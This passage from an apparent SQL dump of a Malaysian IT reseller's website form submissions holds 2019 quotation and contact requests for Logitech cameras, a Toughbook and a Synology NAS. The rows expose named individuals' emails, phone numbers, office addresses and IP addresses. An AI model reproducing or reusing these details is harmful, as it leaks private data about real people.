digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"26\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-05 11:57:50','1.9.117.57','1'),(88,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Lau Chai Joo\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"chaijoo.lau@affinhwang.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"+603 2191 1146\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Affin Hwang Investment Bank\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:70:\"Level 3, Menara Chulan, Jalan Conlay, Kuala Lumpur, 50450 Kuala Lumpur\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"1 unit 960-001054, 1 unit 989-000171, &amp; 1 unit 939-001490\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"19\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-06 09:52:35','211.25.19.250','1'),(89,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"SHAHUL HAMID ALI\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"shd@vitronic.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0164602909\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:38:\"Vitronic Machine Vision Asia Sdn. Bhd.\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"L3-93, Solok Bayan Lepas\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"Logitech C9230e, Logitech C925e\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Need quotation for C930e\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-06 10:01:10','219.92.228.149','1'),(90,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Ahmad Muaz Mohd Khairi\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"muaz@eegassb.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"03 77333957\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"E&amp;E Gas Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"Logitech Group, Group 10m Extended Cable\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-06 11:26:31','203.106.80.197','1'),(91,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Benny Wong\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"bennywyc@unilife.tw\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122875002\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Unilife Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:139:\"Unit 17-1 &amp; 2, Level 17, Tower A, Vertical Business Suite, Avenue 3, Bangsar South, No.8, Jalan Kerinchi, 59200 Kuala Lumpur, Malaysia.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Logitech Connect\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:129:\"Hi there, we are looking for a video conference cam for our office, can you kindly provide a quotation based on Logitech Connect?\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"17\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-06 15:14:39','175.139.131.209','1'),(92,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Too Tean Lai\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"tltoo@pith.com.ny\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0124976383\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"PITH COMPUTER SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:72:\"Panasonic laptop Toughbook CF-SZ6 , can you send me quotation for 2pcs ?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"13\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-07 09:10:51','1.32.116.12','1'),(93,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Mohd Ariffin\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"ithelpdesk.my@globalindianschool.org\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"019-6070229\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:34:\"Global Indian International School\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"242, Lorong Abdul Samad, Brickfields\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Logitech PTZ Pro 2\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:153:\"Hi there, we are now upgrading to a new video conference system and interested on the logitech camera, kindly provide us a quotation for the item chosen.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"89\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-07 12:05:29','175.143.1.177','1'),(94,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Husna\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"aznauna89@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0174123549\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"Mutiara Cita Technologies Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:49:\"RS1619xst synology - please quote the item below.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"30\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-08 15:25:36','183.171.81.90','1'),(95,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full 